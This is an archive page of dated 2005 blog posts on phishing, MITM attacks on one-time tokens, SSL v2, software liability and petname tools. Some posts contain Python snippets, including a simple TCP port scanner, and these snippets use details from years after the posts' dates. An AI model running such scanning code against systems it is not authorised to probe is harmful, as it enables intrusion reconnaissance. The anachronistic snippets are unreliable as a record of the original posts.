    October 14, 2005

    The Perfect Phish - all conditions are now in place

    News of active MITM attacks has reached us, with Yahoo being the one attacked. This involves the phisher driving the traffic from his fake site back to Yahoo in real time. Previously, phishers just collected the data and used it later; now they get access directly, which gives them immediate possibilities in the event that they tripped any alarm bells that would later on close off access.

    Bad news for Lloyds TSB, who are experimenting with what look like SecurID tokens. These tokens do a crypto maths problem that is synchronised with a matching server program back at the website. It is based on time, and the numbers change as the minutes roll by.

    It's a nice token to prove (to some definition of the word) that whoever you are talking to is who you want to be talking to. The problem is, as discussed and predicted not just here but in security groups elsewhere, this only works if the phisher delays acting. It specifically and famously doesn't work against the above man-in-the-middle (MITM) attack, as it can't tell if anyone else is sitting in between you and the other party! Sorry about that, but you do insist on buying these things from big companies and not doing the proper due diligence.
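    To see why, here's a generic sketch of a time-based token in Python (RFC 6238 style; whatever Lloyds' actual tokens compute has not been published, so treat this as illustrative):

        import hmac, hashlib, struct, time

        def time_code(secret: bytes, step=60, digits=6, now=None):
            """One-time code derived from a shared secret and the clock."""
            counter = int((now if now is not None else time.time()) // step)
            mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
            offset = mac[-1] & 0x0F
            code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
            return f"{code % 10 ** digits:0{digits}d}"

        secret = b"shared-token-seed"   # placeholder seed known to token and server
        print(time_code(secret))

        # The MITM doesn't need to break any of this: he simply forwards the
        # fresh code to the real bank within the same time step and logs in.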

    How significant is all this? Well, quite important: it's the last link. Every piece is now in place for the perfect phish. The phishers recently tried out SSL attacks in anger so they have all that cert and SSL code in place, they are now doing MITMs so they have the real-time backend work in place (this is just multi-tiered or webservice work, recall) and we've had easy-to-obtain popup-tax certs for about 2-3 years now (even works with a stolen credit card...).

    When the perfect phish takes place is difficult to predict, but I'll stick my neck out and say by the end of the year. Users will be looking at a perfectly good website, with SSL and the little padlock, and talking to their banks. The only thing that will be wrong will be the URL, but it will be camouflaged somehow. Is this realistic? Very. For the last year or more we've been in a holding pattern as phishers have migrated their model from area to area looking for new schools of fresh phish.

    Posted by iang at 03:34 PM | Comments (12) | TrackBack

    October 12, 2005

    Developers 'should be liable' for security holes

    It just gets better and better! Twan points out a chap called Howard Schmidt who popped over from the US to tell the Brits how to do it. Number One prescription is to pin it on the individual developers:

    Software developers should be held personally accountable for the security of the code they write, said Howard Schmidt, former White House cybersecurity advisor, on Tuesday.
    Speaking at Secure London 2005, Schmidt, who is now the president and chief executive of R&H Security Consulting, also called for better training for software developers, many of whom he believes don't have the skills needed to write secure code.

    "In software development, we need to have personal quality assurances from developers that the code they write is secure," said Schmidt, who cited the example of some developers he recently met who had created a Web application to talk to a back-end database using SSL.

    "They had strong authentication, strong passwords, an encrypted tunnel. The stored data was encrypted. But, when that data was sent to the purchasing office, it was sent as a plain text file. This was not an end-to-end solution. We need individual accountability from developers for end-to-end solutions so we can go to them and say: 'Is this completely secure?'," Schmidt said.

    Schmidt also referred to a recent survey from Microsoft which found that 64 percent of software developers were not confident they could write secure applications. For him, better training is the way forward.

    What can we gather from that? Well, approximately 64% of the people that Microsoft surveyed are honest, or at least weren't going to be caught by the obvious trick question.

    This completely stinks of a manager's first order solution: see pile of smelly brown muck, blame the person standing closest. With this level of analysis, we can only thank our lucky stars that Schmidt didn't get promoted from cybersecurity advisor to Strategic Air Command or the captaincy of an Aegis cruiser.

    Predictably, the comments section on that article is full to bursting with outraged developers who are pointing out quite rightly that they don't own the code, don't own the budget, and don't own the managers. And the British Computer Society was on hand to remind us that security is quite tricky stuff, really, thank you very much. Although I think they lost it here:

    "...They should also be accredited with a CMM [Capability Maturity Model] standard - it's like a kitemark. CMM level three, four or five is an indication the software has been developed by quality developers," the BCS spokesperson said. "The software has to be shown to be fit for purpose. This is essential for producing a trustworthy online environment."

    Oh well, thanks Twan for sharing with us what is causing giggles in mainland Europe.

    Posted by iang at 03:47 PM | Comments (0) | TrackBack

    October 11, 2005

    SSL v2 SNAFU

    The net is buzzing about an "OpenSSL Potential SSL 2.0 Rollback Vulnerability" (1, 2) where you can trick your SSL v3 to roll back to SSL v2. There are then some security weaknesses in SSL v2 that can be exploited to break in.

    Annoyingly, none of the security advisories that I saw said what should be the obvious workaround: *TURN OFF SSL V2! NOW!* It's an old protocol, it's done its job and deserves to be put out to pasture. Give it an apple a day and let it enjoy its last few years without shame.
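    In today's terms the workaround is a couple of lines at context-creation time - a sketch in modern Python (current OpenSSL builds have since removed SSLv2 outright, making the first flag a no-op there, but the principle stands: don't offer the old protocol at all and there is nothing to roll back to):

        import ssl

        ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)  # "negotiate the best available"
        ctx.options |= ssl.OP_NO_SSLv2             # never offer or accept SSLv2
        ctx.options |= ssl.OP_NO_SSLv3             # same medicine, one version up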

    The presence of SSL v2 continues to embarrass us with insecurity. This security advisory is the least of worries, by far the greater effect is that with SSL v2 delivered as a default protocol, all browsers and all web servers end up negotiating SSL v2. That's because the HELLO negotiation can only cope with both v2 and v3 nodes if it assumes the first, and both nodes will then fall back to SSL v2. Maybe the security advisory should be extended to all the browsers and web servers out there?

    Meanwhile, the reason we care is not because an MITM could break into SSL v2 (fat chance of that happening) but because we can't do virtual hosts without SSL v3. This is a good solid pragmatic user and business reason and cryptoengineers, security experts and the like are not expected to understand this: Without virtual hosts, we can't spread SSL to be a *routine* protection for all web sites. And without SSL being a *routine* protection, the security model in the browser won't get fixed and phishing rampantly pillages its way through suburban america like a bad 90s music revival. Depressing, expensive and accompanied by lots of screaming and wailing when people realise their wallets just got emptied by ... well, like any revival, we don't really want to admit we know who it was by.

    Anyway, the upshot is that the security advisory misses the chance to deliver any security to people. SSL remains SNAFU: Situation Normal, All F**ked Up.

    Posted by iang at 12:01 PM | Comments (0) | TrackBack

    October 07, 2005

    Blaming the Banks won't work

    Bruce Schneier outlines some of the factors behind phishing and then tries to stick it on the banks. Sorry, won't work - the Banks are victims in this too, and what's more they are not in the direct loop.

    Make Banks Responsible for Phishers

    ...
    Push the responsibility -- all of it -- for identity theft onto the financial institutions, and phishing will go away. This fraud will go away not because people will suddenly get smart and quit responding to phishing e-mails, because California has new criminal penalties for phishing, or because ISPs will recognize and delete the e-mails. It will go away because the information a criminal can get from a phishing attack won't be enough for him to commit fraud -- because the companies won't stand for all those losses.

    If there's one general precept of security policy that is universally true, it is that security works best when the entity that is in the best position to mitigate the risk is responsible for that risk. Making financial institutions responsible for losses due to phishing and identity theft is the only way to deal with the problem. And not just the direct financial losses -- they need to make it less painful to resolve identity theft issues, enabling people to truly clear their names and credit histories. Money to reimburse losses is cheap compared with the expense of redesigning their systems, but anything less won't work.

    You can't push all of the responsibility onto the FIs. Here's why:

    1. Phishing is an attack on the user primarily and only secondarily on the FI. Consider what happens: the phisher sends a request (by email) to the user to have her send her details to him (using her browser). The parts in parentheses are optional but key: phishing is an attack on the browser using email to deliver the phish. We can more or less change the email to chat or SMS for example, but it is harder to change the browser component.

    What's constant about all those issues is that the banks aren't in that primary loop as yet. So even if they have all the responsibility they are strictly limited in how they tell the user to "not do that."

    2. FIs aren't the only target of phishing. Amazon and eBay are both big targets. So any attempt to stick it to the banks is just going to shift the attention to all sorts of other areas. Expect Amazon and every other merchant to prefer not to have that happen.

    3. If you want to stick it to anyone, go looking for where this came from. The banks picked up this security model from somewhere. Here's where: the browser security model that was built on a miscast threat analysis, the server security model that was subject to big companies' agendas, and the client security model which is simply best described as "Insecurity by Microsoft." All of these elements are broken, in the security jargon.

    If you want someone to blame for phishing in the wider sense, look to who pushed the tech (Microsoft, three times over. RSADSI, Verisign, Netscape for the browser security model. For server side, Sun, IBM, and thousands of security experts who said that as long as you buy our firewall you'll be OK. And don't forget whoever audited these systems and said they were secure. Yes, you four, or is it three... you know who I'm talking about.)

    Ask this long list of beneficiaries how much liability *they* have for a breach. The answer may surprise: Nix, zip, nada, zilch. Zero in all currencies. So if you stick it to the banks, guess who's next on the list?

    4. Taking a risk truism and extending it to a particular case is dangerous. It may be that security works best when those in the best position take on responsibility for those risks they can best mitigate. And it's clear that the banks are the larger party here and well capable of doing something to address phishing.

    But if you put *all* the responsibility onto one party, not only do you have a measurement problem, you'll also have a moral hazard problem. Users will then shop and hook with gay abandon. How are banks supposed to keep up with attacks by both users and phishers? Turning off online banking is the only answer I can think of.

    Posted by iang at 11:37 AM | Comments (5) | TrackBack

    October 06, 2005

    Security Software faces rising barriers

    Signs abound that it is becoming more difficult to do basic security and stay clean oneself. An indictment for selling software was issued in the US, and this opens up the Pandora's box of what is reasonable behaviour in writing and selling software.

    Can writing software be a crime? By Mark Rasch, SecurityFocus (MarkRasch at solutionary.com) Published Tuesday 4th October 2005 10:05 GMT

    Can writing software be a crime? A recent indictment in San Diego, California indicates that the answer to that question may be yes. We all know that launching certain types of malicious code - viruses, worms, Trojans, even spyware or sending out spam - may violate the law. But on July 21, 2005 a federal grand jury in the Southern District of California indicted 25 year old Carlos Enrique Perez-Melara for writing, advertising and selling a computer program called "Loverspy," a key logging program designed to allow users to capture keystrokes of any computer onto which it is installed. The indictment raises a host of questions about the criminalization of code, and the rights of privacy for users of the Internet and computers in general.

    We all might agree that what the defendant did is distasteful at some level, but the real danger here is that what is created as a precedent against key loggers will be used against other things. Check your local security software package list, and mark about half of them for badness at some level. I'd say this is so inevitable that any attention paid to the case itself ("we need to stop this!") is somewhere between ignorance and willful blindness.

    On a similar front, recall the crypto regulations that US security authors struggle under. My view is that the US government's continuing cryptopogrom feeds eventually into the US weakness against cyber threats, so they've only themselves to blame. Which might be ok for them, but as software without crypto also affects the general strength of the Internet at large, it's yet another case of society at large v. USG. Poking around over on PRZ's xFone site I found yet another development that will hamper US security producers from securing themselves and us:

    Downloading the Prototype

    Since announcing this project at the Black Hat conference, a lot of people have been asking to download the prototype just to play with it, even though I warned them it was not a real product yet. In order to make it available for download, I must take care of a few details regarding export controls. After years of struggle in the 1990's, we finally prevailed in our efforts to get the US Government to drop the export controls in 2000. However, there are still some residual export controls in place, namely, to prevent the software from being exported to a few embargoed nations-- Cuba, Iran, Libya, North Korea, Sudan, and Syria. And there are now requirements to check customers against government watch lists as well, which is something that companies such as PGP have to comply with these days. I will have to have my server do these checks before allowing a download to proceed. It will take some time to work out the details on how to do this, and it's turning out to be more complicated than it first appeared.

    (My emphasis.) Shipping security software now needs to check against a customer list as well? Especially one as bogus as the flying-while-arab list? Phil is well used to being at the bleeding edge of the crypto distribution business, so his commentary indicates that the situation exists, and he expects to be pursued on any bureaucratic fronts that might exist. Another sign of increasing cryptoparanoia:

    The proposal by the Defense Department covers "deemed" exports. According to the Commerce Department, "An export of technology or source code (except encryption source code) is 'deemed' to take place when it is released to a foreign national within the United States."

    The Pentagon wants to tighten restrictions on deemed exports to restrict the flow of technical knowledge to potential enemies.

    A further issue that has given me much thought is the suggestion by some that security people should not break any laws in doing their work. I saw an article a few days back on Lynn's list (was lost, now found) that described how the FBI cooperates with security workers who commit illegal or questionable acts in chasing bad guys, in this case extortionists in Russia (this para heavily rewritten now that I've found the article):

    The N.H.T.C.U. has never explicitly credited Prolexic’s engineers with Maksakov’s arrest. “The identification of the offenders in this came about through a number of lines of inquiry,” Deats said. “Prolexic’s was one of them, but not the only one.” In retrospect, Lyon said, “The N.H.T.C.U. and the F.B.I. were kind of using us. The agents aren’t allowed to do an Nmap, a port scan”—techniques that he and Dayton Turner had used to find Ivan’s zombies. “It’s not illegal; it’s just a little intrusive. And then we had to yank the zombie software off a computer, and the F.B.I. turned a blind eye to that. They kind of said, ‘We can’t tell you to do that—we can’t even suggest it. But if that data were to come to us we wouldn’t complain.’ We could do things outside of their jurisdiction.” He added that although his company still maintained relationships with law-enforcement agencies, they had grown more cautious about accepting help.

    What a contrast to the view that security workers should never commit a "federal offence" in doing their work.

    I find the whole debate surrealistic, as the laws that create these offences are so broad and sweeping that it is not clear to me that a security person can do any job without breaking some of them; or is this just another sign that most security people are more bureaucrats than thinkers? I recently observed a case where, in order to find some security hardware, a techie ran a portscan on a local net and hard-crashed the very equipment he was looking for. In the ensuing hue and cry over the crashed equipment (I never heard if they ever recovered the poor stricken device...), the voice that was heard loudest was that "he shouldn't be doing that!" The voice that went almost unheard was that the equipment wasn't resilient enough to do the job of securing the facility if it fell over when a mere port scan hit it.
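
    For perspective, a "mere port scan" of the connect variety is nothing more than a loop of ordinary connection attempts. A minimal sketch in Python (the target address is a hypothetical documentation address) shows how little it takes to knock over equipment that brittle:

        import socket

        def connect_scan(host: str, ports: range) -> list[int]:
            # A plain TCP connect scan: try to open each port in turn and
            # note which ones answer. The traffic is ordinary connections.
            open_ports = []
            for port in ports:
                with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
                    s.settimeout(0.5)
                    if s.connect_ex((host, port)) == 0:
                        open_ports.append(port)
            return open_ports

        # 192.0.2.10 is a documentation address; substitute your own net.
        print(connect_scan("192.0.2.10", range(1, 1025)))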

    Barriers are rising in the security business. Which is precisely the wrong thing to do; security is mostly a bottom-up activity, and making it difficult for the small players and the techies at the coalface will reduce overall security for all. The puzzling thing is why other people do not see that; why we have to go through the pain of Sarbanes-Oxley, expensive CA models, suits against small software manufacturers, putting software tool-makers and crypto protocol designers in jail and the like in order to discover that inflexible rules and blind bureaucracy have only a limited place to play in security.

    Addendum: Security consultant convicted for ... wait for it: doing due diligence on a charity site in case it was a scam!

    Posted by iang at 08:44 AM | Comments (3) | TrackBack

    September 29, 2005

    Microsoft, Office SP2, anti-phishing, security patches, the real situation, and the arms race.

    In security pennies, Microsoft released SP2 for Office with some attention to phishing:

    The most noteworthy enhancement is the addition of a new Phishing Protection feature to Outlook 2003's Junk E-mail Filter. This feature will be turned on by default for users who have Office 2003 SP2 and the latest Outlook 2003 Junk E-mail Filter Update, the company said.

    To which I say the most noteworthy thing is that either the press or Microsoft thought that anti-phishing is the most important thing. Yet, to me, a Junk email filter improvement that picks up phishing emails is so underwhelming that I hesitate with embarrassment to ask this question: why is it that big browser companies like Mozilla and Microsoft think that they can address phishing at the email level by expanding their Bayesian filters?
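
    For readers who haven't met the technique, here is a minimal sketch of the token-scoring such Bayesian filters perform - all training counts are made-up numbers, and real filters are far more elaborate. The catch is visible right in the code: the attacker chooses the tokens, so a phish that reads like genuine bank mail scores like genuine bank mail:

        import math

        # Token counts from labelled training mail (made-up numbers).
        phish_counts = {"verify": 40, "account": 35, "click": 30, "meeting": 1}
        ham_counts   = {"verify": 2,  "account": 10, "click": 5,  "meeting": 50}
        n_phish, n_ham = 100, 100  # training messages in each class

        def phish_probability(tokens):
            # Naive Bayes: combine per-token likelihoods, assuming independence,
            # with add-one smoothing so unseen tokens don't zero things out.
            log_odds = math.log(n_phish / n_ham)
            for t in tokens:
                p_phish = (phish_counts.get(t, 0) + 1) / (n_phish + 2)
                p_ham = (ham_counts.get(t, 0) + 1) / (n_ham + 2)
                log_odds += math.log(p_phish / p_ham)
            return 1 / (1 + math.exp(-log_odds))

        print(phish_probability(["verify", "account", "click"]))  # ~0.99
        print(phish_probability(["meeting"]))                     # ~0.04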

    Any comments out there? What am I missing?

    There are security enhancements in the SP2 pack, but as one wit had it: "Cool! Now ... will it work?" The security disaster continues:

    A new report from the Information Security Forum (ISF) warns that Trojan-based attacks are becoming more sophisticated and harder to stop. The ISF - a not-for-profit organisation with 260 members including half of the Fortune 100 - believes this sophistication will see Trojans soon take over from email phishing. But, it warns, phishing is still big business - more than a third of ISF members have been affected by phishing attacks.

    Yes, this is the well known conclusion. Trojans can take over the Microsoft Windows computer and do the lifting of account information without the user having to do *anything*. Once the early, clumsy email phishing model had generated enough finance to invest in virus/trojan-based attacks, this move was inevitable.

    What does this mean? The underground shift that the press dare not speak of will firm up, and the decade(s) long domination of Microsoft Windows will end, I predict. People never had a real reason to shift from Microsoft computers before, but nobody was stealing their money before. Long term view: sell Microsoft, buy Apple.

    Jean sends this snippet entitled An 'arms race' no one can stop, and it speaks to the general security view:

    Periodic attacks against computers by vandals, terrorists, and allegedly by governments such as that of China, have raised cyber-security to the top of the computer community's agenda.

    Computer experts warn. National security officials sound alarm. Banks clamor. The press writes sensational stories. And the public seems fascinated by the exotically named and poorly understood threats. Everybody, it seems, agrees that cyber security needs to be beefed up.

    Today indeed there may be a deficit of computer security. But it seems inevitable that tomorrow we will have too much of it. How can there be too much security? Security tends to prevent bad things from happening. But it also prevents some good things from emerging.

    Some cyber-security makes private and societal sense, of course. Backup file systems, decentralisation, firewalls, password, all of these are reasonable measures. But since they do not stop determined intruders, the tendency is for increased security measures.

    How much should a company spend for its computer security? Total security is neither achievable nor affordable. Instead, a company would engage in some form of cost-benefit analysis, in which it compares the cost of harm avoidance with the benefit of such reduced harm.

    But in the real world, the data for such calculation is systematically skewed in the direction of exaggerated harm and understated cost of prevention. Take the cost of harm.
    ...

    So more than a few people have recognised that we've been spending big and talking big on security for the last decade or so, and it's now getting worse. What's the disconnect here? That is indeed a topic of current research, but at least it has started to enter the radar screens of security thinkers.

    Posted by iang at 06:01 AM | Comments (1) | TrackBack

    September 16, 2005

    PayPal protected with Trustbar and Petnames

    Here's how your Paypal browsing can be protected with Trustbar:

    Apologies for the huge image! Notice the extra little window that has "PayPal, Inc" in it. That's a label that indicates that you have selected this site as one of your trusted ones. You can go even further and type in your own label such as "Internet money" or "How I Pay For Things" in which case it will turn green as a further indicator that you're in control.

    This label of yours is called a petname, and indicates that Trustbar has found the certificate that you've labelled as PayPal. And, as that's the certificate used to secure the connection, it is really your Paypal you are talking to, not some other bogus one.
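
    Mechanically the idea is tiny: key your own label on the certificate itself, not on anything the attacker gets to choose. Here's a minimal sketch of a petname store (a hypothetical API; Trustbar's internals may well differ):

        import hashlib

        petnames = {}  # certificate fingerprint -> the user's own label

        def fingerprint(cert_der: bytes) -> str:
            # Identify the site by a digest of the exact certificate bytes.
            return hashlib.sha1(cert_der).hexdigest()

        def assign_petname(cert_der: bytes, label: str) -> None:
            petnames[fingerprint(cert_der)] = label

        def lookup(cert_der: bytes):
            # Returns the label only if this exact certificate was named
            # before; a phisher's certificate simply has no entry.
            return petnames.get(fingerprint(cert_der))

        assign_petname(b"...paypal certificate bytes...", "How I Pay For Things")
        print(lookup(b"...paypal certificate bytes..."))   # the green label
        print(lookup(b"...phisher certificate bytes..."))  # None - no label

    The phisher can clone the page, the logo and a look-alike domain name, but not the certificate, so his site simply comes up unlabelled.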

    Trustbar also allows you to assign logos to your favourite sites. These logos allow you to recognise more quickly than words which site you are at. (Scribbler's note: there are more screen shots at Trustbar's new help page.)

    These are simple, powerful ideas and the best we have at the moment against phishing. You can do the same thing with the Petname toolbar, which just implements the own-label part. It's smaller, neater, and works on more platforms such as OSX and FreeBSD, but is not as powerful.

    One thing that both of these tools rely heavily upon is SSL. That's because the SSL certificate is the way they know that it's really the site - if you take away the certificate then there is no way to be sure, and we know that the phishers are generally smart enough to trick any maybes that might be relied upon.

    Trustbar allows you to assign a name to a site that has no SSL protection - but Petnames does not. In this sense, Trustbar says that most attacks occur outside SSL and we should protect against the majority of attacks, whereas Petnames draws a line in the sand - the site must be using SSL and must be using a certificate in order to make reliable statements. Both of these are valid security statements, and they will eventually converge over time.


    For security insiders, Philipp posts news of a recent phishing survey. I've skimmed it briefly, and it puts hard evidence behind the claim that phishing is now institutionalised. Worth a visit!

    The Economy of Phishing: A survey of the operations of the phishing market

    Christopher Abad

    Abstract:
    Phishing has been defined as the fraudulent acquisition of personal information by tricking an individual into believing the attacker is a trustworthy entity. Phishing attacks are becoming more sophisticated and are on the rise. In order to develop effective strategies and solutions to combat the phishing problem, one needs to understand the infrastructure in which phishing economies thrive.

    We have conducted extensive research to uncover phishing networks. The result is detailed analysis from 3,900,000 phishing e-mails, 220,000 messages collected from 13 key phishing-related chat rooms, 13,000 chat rooms and 48,000 users, which were spidered across six chat networks and 4,400 compromised hosts used in botnets.

    This paper presents the findings from this research as well as an analysis of the phishing infrastructure.


    Closing notes. This page I am updating as new info comes in.

    Another note for journalists: over at the Anti-fraud mailing list Anti-Fraud Coffee Room you can find the independent researchers who are building tools based on the nature of the attack, not the current flavour of the month.

    Posted by iang at 09:35 AM | Comments (1) | TrackBack

    August 31, 2005

    The HR Malaise in Britain - 25% of CVs are fiction

    As discussed here a while back in depth, there is an increasing Human Resources problem in some countries. Here's actual testing of the scope of the issue, whereby employers invite people to lie to them in the interview, and jobseekers happily oblige:

    One CV in four is a work of fiction

    By Sarah Womack, Social Affairs Correspondent (Filed: 19/08/2005)

    One in four people lies on their CV, says a study that partly blames the "laxity" of employers.

    The average jobseeker tells three lies but some employees admitted making up more than half their career history.

    A report this month from The Chartered Institute of Personnel and Development highlights the problem. It says nearly a quarter of companies admitted not always taking up candidates' references and a similar percentage routinely failed to check absenteeism records or qualifications.

    Example snipped...

    The institute said that the fact that a rising number of public sector staff lie about qualifications or give false references was a problem not just for health services and charities, where staff could be working with vulnerable adults or children, but many public services.

    The institute said a quarter of employers surveyed ''had to withdraw at least one job offer. Others discover too late that they have employed a liar who is not competent to do the job."

    Research by Mori in 2001 showed that 7.5 million of Britain's 25.3 million workers had misled potential employers. The figure covered all ages and management levels.

    The institute puts the cost to employers at £1 billion.

    © Copyright of Telegraph Group Limited 2005.

    If 25% of workers admitted to making material misrepresentations, that shows it is not an abnormality; rather, lying to get a job is normal. Certainly I'd expect similar results in the computing and banking (private) sectors, and before you get too smug over the pond, I'd say if anything the problem is worse in the US of A.

    There is no point in commenting further than to point to this earlier essay: Lies, Uncertainty and Job Interviews. I wonder if it had any effect?

    Posted by iang at 10:47 AM | Comments (0) | TrackBack

    August 28, 2005

    Microsoft to release 'Phishing Filter'

    It looks like Microsoft are about to release their anti-phishing tool (first mooted months ago here):

    WASHINGTON _ Microsoft Corp. will soon release a security tool for its Internet browser that privacy advocates say could allow the company to track the surfing habits of computer users. Microsoft officials say the company has no intention of doing so.

    The new feature, which Microsoft will make available as a free download within the next few weeks, is prompting some controversy, as it will inform the company of Web sites that users are visiting.

    The browser tool is being called a "Phishing Filter." It is designed to warn computer users about "phishing," an online identity theft scam. The Federal Trade Commission estimates that about 10 million Americans were victims of identity theft in 2005, costing the economy $52.6 billion dollars.

    What follows in that article is lots of criticism. I actually agree with that criticism, but in the wider picture it is more important for Microsoft to weigh into the fight than to get it right. We have a crying need to focus the problem on what it is - the failure of security tools and the security infrastructure that Microsoft and other companies (RSADSI, VeriSign, CAs, Mozilla, Opera...) are peddling.

    Microsoft, by dint of the fact that they are the only large player taking phishing seriously, are now the leaders in security thinking. They need to win some, I guess.

    (Meanwhile, I've reinstated the security top tips on the blog, by popular demand. These tips are designed for ordinary users. They are so brief that even ordinary users should be able to comprehend - without needing further reference. And, they are as comprehensive as I can get them. Try them on your mother and let me know...)

    Posted by iang at 06:19 AM | Comments (0) | TrackBack

    August 20, 2005

    Notes on security defences

    Adam points to a great idea by EFF and Tor:

    Tor is a decentralized network of computers on the Internet that increases privacy in Web browsing, instant messaging, and other applications. We estimate there are some 50,000 Tor users currently, routing their traffic through about 250 volunteer Tor servers on five continents. However, Tor's current user interface approach — running as a service in the background — does a poor job of communicating network status and security levels to the user.

    The Tor project, affiliated with the Electronic Frontier Foundation, is running a UI contest to develop a vision of how Tor can work in a user's everyday anonymous browsing experience. Some of the challenges include how to make alerts and error conditions visible on screen; how to let the user configure Tor to use or avoid certain routes or nodes; how to learn about the current state of a Tor connection, including which servers it uses; and how to find out whether (and which) applications are using Tor safely.

    This is a great idea!

    User interfaces are one of our biggest challenges in security, alongside the challenge of shifting mental models from no-risk cryptography across to opportunistic cryptography. We've all seen how incomplete UIs can drain a project's lifeblood, and we all should know by now just how expensive it is to create a nice one. I wish them well. Of the judges, Adam was part of the Freedom project, which was a commercial forerunner for Tor (I guess), and is a long-time privacy / security hacker. Ping runs Usable Security - the nexus between UIs and secure coding. (The others I do not know.)

    In other good stuff, Brad Templeton was spotted by FM carrying on the good fight against the evils of no-risk cryptography (1, 2, 3). Unfortunately there is no blog to point at but the debate echoes what was posted here on Skype many moons back.

    The mistakes that the defender, SS, makes are routine:

    1. Confused threat models, in the normal fashion: because we can identify one person on the planet who needs ultimate, top-notch security, we assert that all people need this. (c.f., airbags and human rights workers. Pah.)

    2. Confused user-needs model, again normal. The needs of a corporation selling to fee-paying clients are completely disjoint from the needs of the Internet user. The absence of concern for the Internet's security at systemic levels, in place of the need to sell product, is the mess we have to clean up today. E.g., "There is an abundance of encryption in use today where it's needed." should be read as "Cryptography should be everywhere we can sell it, and is dangerous elsewhere."

    3. Ye Olde Mythe that security-by-obscurity results in a false sense of security. In practice, security-by-sales has led to a much greater and thus falser sense of security, and is part and parcel of the massive security mess we face now.

    4. Because opportunistic cryptography so challenges the world view of old-timers and commercial security providers, they have a lot of trouble being scientific about it and often feel they are being attacked personally. This means they are unable to contribute to the debate about phishing, malware and the like, as they are still blocked on selling the very model that brought about these ills. Every time they get close to discovering how these frauds come about, they have to reject the logic that points at the solution as the problem.

    Breaking through this barrier, getting people to think scientifically and use cryptography to benefit has proven to be the hardest thing! But the meme might be starting to take hold. Scanning Ping's blog, it seems he has been pushing the idea of a competition for some time:

    The best I’ve been able to come up with so far is this:
    Hold yearly competitive user studies in which teams compete to design secure user interfaces and develop attacks against other teams’ user interfaces. Evaluate the submissions by testing on a large group of users.

    And this logic is in direct response to the discord between what users will use and what security practitioners will secure. (And, note that Brad Templeton, Jedi noted above, is apparently the chair of the EFF running this competition.)

    Ping asks is there any other way? Yes, I believe so. If you are mild of heart, or are not firmly relaxed, stop reading now.

    <ControversyAlert>

    The ideal security solution is built with no security at all. Only later, after the model has been proven as actually sustainable in an economic fashion, should security be added.

    And then, only slowly, and only in ways that attempt not to change or limit the user's ability. The only reason to take away usability from the users is if the system is performing so badly it is in danger of collapse.

    </ControversyAlert>

    This model is at the core of the successful security systems we generally talk about. Credit cards worked this way, adding security hacks little by little as fraud rates rose. Indeed, when something really, truly secure was added, it either flopped (smart cards were rejected) or backfired (SSL led to phishing).

    To switch sides and maintain the same point :-) just-in-time cryptography is how the web was secured! First HTTP was designed, and then a bandaid was added. (Well, actually TLS is more of a plaster cast where a bandaid should have been used, but the point remains valid, and bidirectional.)

    Same with SSH - first Telnet proved the model, then it was replaced by SSH. PGP came later than email and secured it after email was proven. WEP is adequate in strength for wireless, but it is too hard to turn on, so it has failed to impress. Why is it too hard to turn on? Perversely, because it was built too securely.

    Digital cash never succeeded - and I suggest it is in part because it was designed to be secure from the ground up. In contrast look at Paypal and the gold currencies. Basically, they are account money with that SSL-coloured plaster cast slapped on. (They succeeded, and note that the gold currencies were also the first to treat and defeat phishing on a mass scale.)

    So, over to you! We already know this is an outrageous claim. The question is why is JIT crypto so close to reality? How real is it? Why is it that everything we've practiced as a discipline has failed, or only worked by accident?

    (See also Security Usability with Peter Gutmann.)

    August 11, 2005

    Is Security Compatible with Commerciality?

    A debate has erupted over the blogspace where some security insiders (Tao, EC) are saying that there is real serious exploit code sitting there waiting to be used, but "if we told you where, we'd have to kill you."

    This is an age old dilemma. The outsiders (Spire) say, "tell us what it is, or we believe you are simply making it up." Or, in more serious negotiating form, "tell us where or you're buying the beers."

    I have to agree with that point of view as I've seen the excuse used far too many times, from security to finance to war plans. Both inside and outside. In my experience, when I do find out the truth, the person who made the statement was more often wrong than right, or the situation was badly read, and nowhere near representative.

    Then, of course, people say that they have no choice because they are under NDA. Well, we all need to eat, don't we? And we need to maintain faith and reputation for our next job, so the logic goes.

    This is a trickier one. Again, I have my reservations. If a situation is a real security risk, then what ever happened to the ethics of a security professional? Are we saying that it's A-OK to claim that one is a security professional, but anything covered by an NDA doesn't count? Or that when a company operates under NDA, it's permitted to conduct practices that would ordinarily be deemed insecure?

    Fundamentally, an NDA switches you from whatever you believed you were before into an agent of the company. That's the point. So you are now under the company's agenda - and if the company is not interested in security then you are no longer interested in security, even if the job is chief security blah blah. Is that harsh? Not really; most security companies are strictly interested in selling whatever sells, and they'll sell an inadequate or insecure tool with a pretty security label with no problem whatsoever. Find us a company that withdrew an insecure tool and said it was no longer serving users, and we might have a debate on this one.

    At the minimum, once you've signed an NDA, you can't go around purporting to have a public opinion on issues such as disclosure if you won't disclose the things you know yourself. Or, maybe, if you chose to participate in the security practices covered under NDA, you are effectively condoning this as a security practice, so you really are making it all up as you go. So in a sense, the only value to these comments is simply as an advert for your "insideness," like the HR people used to mention as a deal breaker.

    It is for these reasons that I prefer security to be conducted out in the open - conflicts like these tend to be dealt with. I've written before about how secret security policies are inevitably perverted to other agendas, and I am now wondering whether the forces of anti-security are wider than that, even.

    It may be that it is simply incompatible to do security in a closed corporate environment.

    Consider the last company you worked at where security was under NDA - was it really secure? Consider the last secure operating system you used - was it one of the closed ones, or one of the free open source implementations with a rabid and angry security forum? Was security just window dressing because customers liked that look, ticked that box?

    Recent moves towards commercialism (by two open organisations in the browser field) seem to confirm this; the closer they get to the commercial model, the more of the security baby gets thrown out with the bath water.

    What do you think? Is it possible to do security in a closed environment? And how is that done? No BS please - leave out the hype vendors. Who seriously delivers security in a closed environment? And how do they overcome the conflicts?

    Or, can't you say because of the NDA?

    Posted by iang at 06:20 PM | Comments (6) | TrackBack

    July 08, 2005

    Liability for Software - is the end of the Security Industry a bad thing or a good thing?

    I've been thinking about software liability a bit and just the other day had a bit of a revelation. If security software came with liability it would destroy the security industry. That's the good news :-) The bad news is that we'd also get some regulation to boot, which would slow things down, as Marcus Ranum points out (by way of Eric Marvets).

    My revelation occurred like this. In the closing stages of a small security job for a friend, I discovered that the intellectual property was being handled with a handshake. This didn't worry me from a property point of view, simply because the <1000 lines of code written weren't worth enough to argue about; it was the process and knowledge that were being charged for.

